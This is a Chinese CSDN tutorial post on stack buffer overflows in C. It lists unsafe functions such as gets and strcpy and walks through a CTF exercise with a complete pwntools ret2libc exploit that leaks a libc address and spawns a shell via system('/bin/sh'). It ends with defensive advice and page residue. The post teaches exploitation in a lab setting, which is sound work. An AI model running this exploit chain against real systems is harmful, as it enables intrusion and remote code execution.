[pwn栈溢出]c语言中的一些危险函数和利用

最新推荐文章于 2024-09-10 10:21:38 发布
最新推荐文章于 2024-09-10 10:21:38 发布
阅读量430 收藏 7
点赞数 5
文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70811025/article/details/137553869
版权
本文详细解释了栈溢出的原理,介绍了容易造成栈溢出的函数,如gets和字符串操作,展示了黑客如何利用栈溢出漏洞获取shell,并提供了防护建议,包括开启保护机制和边界检查。
摘要由CSDN通过智能技术生成

栈溢出原理

栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变。发生栈溢出的基本前提是:

  • 程序必须向栈上写入数据。
  • 写入的数据大小没有被良好地控制。

容易造成栈溢出的函数

  • 输入
    • gets  直接读取一行,忽略'\x00'
    • scanf
    • vscanf
  • 输出
    • sprintf
  • 字符串操作
    • strcpy  字符串复制,遇到'\x00'停止
    • strcat  字符串拼接 ,遇到'\x00'
例子:
#include <stdio.h>

int main(){
        char buf[32];
        gets(buf);   //因为gets()只有遇到'\n'才会停止读取数据,所以向栈中写入的数据大小可以为任意大小
        printf("%s",buf);
        return 0;
}

危害:

当编写代码时,向栈中写入的数据没有做好边界检查,很容易造成栈溢出。栈溢出漏洞存在时,轻则栈中的相邻数据被改写导致程序崩溃,重则导致程序流程被劫持甚至导致被黑客利用取得shell

导致程序崩溃

如下图所示:输入超长的数据导致栈中的返回地址被修改为无效地址,当程序返回时导致报错

黑客利用取得shell

ssize_t vuln()
{
  char buf[32]; // [rsp+0h] [rbp-20h] BYREF

  puts("Pull up your sword and tell me u story!");
  return read(0, buf, 0x64uLL);
}

上面代码我们可以看出read函数向buf中写入数据限制的长度明显大于buf的长度,从而导致栈溢出。

通过pwntool检查程序的保护机制,如下图所示,程序开启了NX(堆栈不可执行)保护

利用思路:

  • 通过栈溢出泄露puts函数的got地址
  • 通过got地址找到对应程序使用的libc
  • 通过libc找到system与/bin/sh
  • 再通过栈溢出执行system('/bin/sh')获取shell
from pwn import *
from LibcSearcher import *

sh = remote("node4.anna.nssctf.cn",28122)
elf = ELF('pwn')

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
vuln = elf.sym['vuln']
#因为程序为64位,调用函数的方式是快速调用即fastcall,函数的前6个参数通过(rdi,rsi,rdx,rcx,r8,9)这6个寄存器传递。所以我们需要在程序中找到ROP片段
pop_rdi = 0x400733
ret = 0x4006AC

#构造payload,使栈溢出,执行puts函数打印puts_got的地址
payload = b'a'*(0x20+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln)

sh.recvuntil("u story!")
sh.sendline(payload)
puts_addr = u64(sh.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))

#通过puts_got地址去找到libc,并通过偏移找到system和'/bin/sh'
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')

payload1 = b'a'*(0x20+8)+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system)
sh.sendline(payload1)

sh.interactive()

如上图所示:通过ret2libc获取到了shell

防护建议
  • 将保护机制全部开启,如NX,Canary,PIE  (linux)
  • 在对栈中的数据进行操作的时候应该对边界进行检查,防止向栈中数据写入的数据超过边界
在二进制海洋中遨游的小李
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
c++堆栈溢出怎么解决_栈溢出基础
weixin_39610422的博客
11-23 3357
一. 基础知识什么是缓冲区溢出在深入探讨技术之前, 让我们先了解一下缓冲区溢出的实际内容.想象一个非常简单的程序, 要求你输入你的用户名, 然后返回到它在做什么.从视觉上看, 如下所示注意到括号之间的空格是输入用户名的预期空间.那个空间是我们的缓冲.处理用户名后, 返回地址将告知程序需要执行的下一个指令.现在, 如果我们不仅输入用户名, 而且添加其他数据以溢出此缓冲区空间, 会发生什么情况?不仅如...
PWN基础知识及基础栈溢出手法
山高路远
04-12 4035
一、pwntools常用函数 函数 用途 send(data) 发送数据(字符串形式发送) sendline(data) 发送一行数据,默认在行尾加 \n(字符串形式发送) recv(numb=1096,timeout=default) 接收指定字节数的数据 buf = p.recvuntil(“\n”, drop=True) 直到接收到\n为止,drop=True表示丢弃\n,buf为接收到的输出但不包括丢弃的\n recvrepeat(timeout=default) 接
栈溢出原理
l2645470582_的博客
08-27 371
​​​​​​​strcpy,字符串复制,遇到'\x00'停止。​​​​​​​gets,直接读取一行,忽略‘\x00’strcat,字符串拼接,遇到'\x00'停止。s距离ebp的长度为0x14。
栈溢出函数,堆溢出函数
weixin_30838873的博客
08-14 83
栈溢出函数,堆溢出函数 1.栈溢出 栈溢出,就是说栈的空间已经不够了。 什么时候会用到栈的空间呢?一般的指令不可能把栈搞到溢出。通常是局部变量和函数调用(函数参数和返回地址)会占用栈的空间。 栈溢出不过两种情形:如果开一个很大的局部变量,会造成栈溢出;如果函数无穷递归,也是会造成栈溢出的。 出自http://www.programlife.net/unexpected-stack-ov...
缓冲区溢出攻击-C语言危险函数
鹿鸣天涯
05-13 4056
1.缓冲区溢出攻击 缓冲区溢出是指当计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量,溢出的数据覆盖在合法数据上。理想的情况是:程序会检查数据长度,而且并不允许输入超过缓冲区长度的字符。但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配,这就为缓冲区溢出埋下隐患。操作系统所使用的缓冲区,又被称为“堆栈”,在各个操作进程之间,指令会被临时储存在“堆栈”当,“堆栈”也会出现缓冲区溢出。...
bugku pwn4(栈溢出
weixin_44954083的博客
12-11 429
查看保护机制,没有任何保护 拉入ida看一下 read函数是一个危险函数,造成栈溢出 查看一下没有binsh字符串,但在ida里面看到哪个$0(这个在linux是shell脚本的名称) system()调用frok()产生子进程,由子进程来调用/bin/sh - c string来执行参数string字符串所代表的命令,系统调用 注一下: ps 是显示当前进程 ps a 显示目前所有程序,包...
PWN入门系列(2)栈溢出
小心信科理化声
12-02 1478
PWN入门系列(2) 栈溢出 栈溢出指的是程序向栈某个变量写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈的变量的值被改变(覆盖)。是一种特定的缓冲区溢出漏洞,类似的还有heap、bss溢出等。其前提是: · 程序必须向栈上写入数据 程序对某个函数或者某个模块的输入数据的大小没有控制得当。 基本示例 举个简单的例子: #include <stdio.h> #include <string.h> void success() { puts("You Hava
C语言函数调用栈
www_xuhss_com的博客
05-15 237
🚀 优质资源分享 🚀 学习路线指引(点击解锁) 知识定位 人群定位 🧡 Python实战微信订餐小程序 🧡 进阶级 本课程是python flask+微信小程序的完美结合,从项目搭建到腾讯云部署上线,打造一个全栈订餐系统。 💛Python量化交易实战💛 入门级 手把手带你打造一个易扩展、更安全、效率更高的量化交易系统 C语言函数调用栈 栈溢出(stack overflow)是最常见的二进制漏洞,在介绍栈溢出之前,我们首先需要了解函数调用栈。 函数调用栈是一块连续的用来保存函数运行状态
手把手教你栈溢出入门
Sakura给爷pwn全场
10-29 749
观察下列个C语言代码: #include<stdio.h> void vulnerable(){ char buf[10]; gets(buf); } int main(){ vulnerable(); } 你会发现这个代码很简单,但是它会产生巨大的安全隐患。在C语言,gets()函数是典型的危险函数。那么gets()函数为什么会产生巨大的安全隐患呢? 这要从内存的运行原理说起。这里需要涉及一点点的汇编知识。 在内存有一种叫做栈的结构,当C语言调用函数时,会在栈产生一个栈帧。内存
从缓冲系统文件到常见栈溢出函数
分不清东西南北的Laffey
11-29 720
List什么是缓冲文件系统?作用代表函数(c语言)非缓冲文件系统特点代表函数栈溢出常见函数0x00 read()函数原型功能返回值0x01 write()函数原型功能返回值0x02 gets()函数原型功能注意0x03 strcpy()和memcpy()和strncpy()函数原型注意0x04 printf()和scanf() 非缓冲和缓冲是相对而言的 了解什么是非缓冲文件系统之前,先了解一下缓冲...
栈溢出漏洞及栈溢出攻击
热门推荐
guilanl的专栏
03-13 1万+
1. 栈溢出的原因 栈溢出(stack-based buffer overflows)算是安全界常见的漏洞。一方面因为程序员的疏忽,使用了 strcpy、sprintf 等不安全的函数,增加了栈溢出漏洞的可能。另一方面,因为栈上保存了函数的返回地址等信息,因此如果攻击者能任意覆盖栈上的数据,通常情况下就意味着他能修改程序的执行流程,从而造成更大的破坏。这种攻击方法就是栈溢出攻击(stack
Linux pwn入门教程(1)——栈溢出基础
dfdhxb995397的博客
06-29 688
作者:Tangerine@SAINTSEC 原文来自:https://bbs.ichunqiu.com/thread-42241-1-1.html 0×00 函数的进入与返回 要想理解栈溢出,首先必须理解在汇编层面上的函数进入与返回。首先我们用一个简单执行一次回显输入的程序hello开始。用IDA加载hello,定位到main函数后我们发现这个程序的逻辑十分简单,调用函数hello...
spring事务详细讲解-深入浅出
小电玩
09-08 466
Spring 事务是本身就是对数据库的事务的支持,没有数据库的事务 Spring 是本身无法实现事务的。Spring只提供了统一事务管理接口,具体的实现还是由各数据库自己实现。在使用 Spring 事务时,可以通过注解或编程方式将需要进行事务管理的方法和代码块标记为事务性操作,当这些操作被执行时,Spring 会负责开启时根据当前环境设置的隔离级别,调整数据库隔离级别。
Java多线程:深入探索与详细解析
m0_63550220的博客
09-08 1452
作为Java的基本执行单元,线程是轻量级的进程,由线程ID、程序计数器、Java虚拟机栈、本地方法栈、和线程私有内存等部分组成。每个线程都有独立的执行路径,但共享进程的资源(如内存)。:进程是系统资源分配的基本单位,它包含了一个或多个线程以及这些线程运行所需的资源。在Java,JVM(Java虚拟机)就是一个进程,而运行在JVM上的多个线程则共享JVM的内存空间。:并发指的是多个任务在同一时间段内交替执行,而并行则指的是多个任务在同一时刻真正同时执行。
Java集合:Stack详解
最新发布
yang_brother的博客
09-10 523
Java 的Stack类是一个后进先出(LIFO, Last In First Out)的数据结构,它继承自Vector类。尽管Stack是一个可用的类,但它被认为是遗留的,并且在新代码不推荐使用。通常建议使用Deque或ArrayDeque作为替代。
币安/OK现货合约量化系统APP开发
I592O929783的博客
09-08 539
后端:考虑系统需要处理大量实时数据和高频交易的特点,选择高性能的编程语言和技术框架,如Python的Django或Flask框架,Java的Spring Boot等。用户交互界面:设计直观易用的用户交互界面,包括交易界面、策略配置界面、风险管理界面等,方便用户进行交易操作、策略配置和风险管理。市场数据接入:开发市场数据接入模块,从币安等交易所或数据服务商获取实时的市场数据,包括行情数据、订单簿数据、成交数据等。前端:选择适合开发复杂界面的前端框架,如React、Vue.js等,以提供用户友好的交互界面。
ctfshow PWN 栈溢出
08-23
PWN是一种以攻破计算机系统的漏洞为目的的竞赛类型,参赛者需要利用漏洞进行攻击并获取系统权限。在ctfshow PWN栈溢出是一种常见的攻击方式。 根据提供的引用,我了解到栈溢出是一种通过向程序输入过长的数据导致数据溢出栈的一种攻击手段。栈是一种数据结构,用于存储程序的局部变量和函数调用的返回地址等信息。当程序接收到超出栈空间大小的数据时,溢出的数据会覆盖到栈上的其他数据,从而可能改变程序的执行流程。 根据引用,在ctfshow PWN,参赛者可以利用栈溢出漏洞来控制程序的执行流程。通过向程序输入特制的数据,可以覆盖控制流的返回地址,使程序跳转到攻击者精心构造的代码,从而达到获取系统权限的目的。 具体来说,参赛者可以通过向程序发送超出预期的数据,覆盖栈上的返回地址,使其指向攻击者准备好的恶意代码,从而实现栈溢出攻击。攻击者可以利用此漏洞来执行任意代码,包括获取系统权限、执行恶意操作等。 引用和引用提供了一些示例代码,演示了如何利用栈溢出漏洞进行攻击。这些代码使用Python的pwn库来与目标程序进行交互,并通过构造特制的payload来触发栈溢出漏洞,最终实现控制程序执行流程的目的。 需要注意的是,栈溢出是一种非常危险的漏洞,合法的程序设计应该避免出现此类问题。在实际应用,为了防止栈溢出攻击,开发者需要加强输入验证和数据处理等安全机制。 总结起来,ctfshow PWN栈溢出是一种通过向程序输入过长数据导致栈溢出的攻击方式,在该竞赛常用于获取系统权限和执行恶意操作。攻击者可以利用漏洞覆盖返回地址,使程序执行恶意代码。然而,栈溢出是一种危险的漏洞,合法的程序设计应该避免此类问题。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [ctfshow pwn4](https://blog.csdn.net/qq_39980610/article/details/126461902)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [ctfshow pwn5](https://blog.csdn.net/qq_39980610/article/details/126462163)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值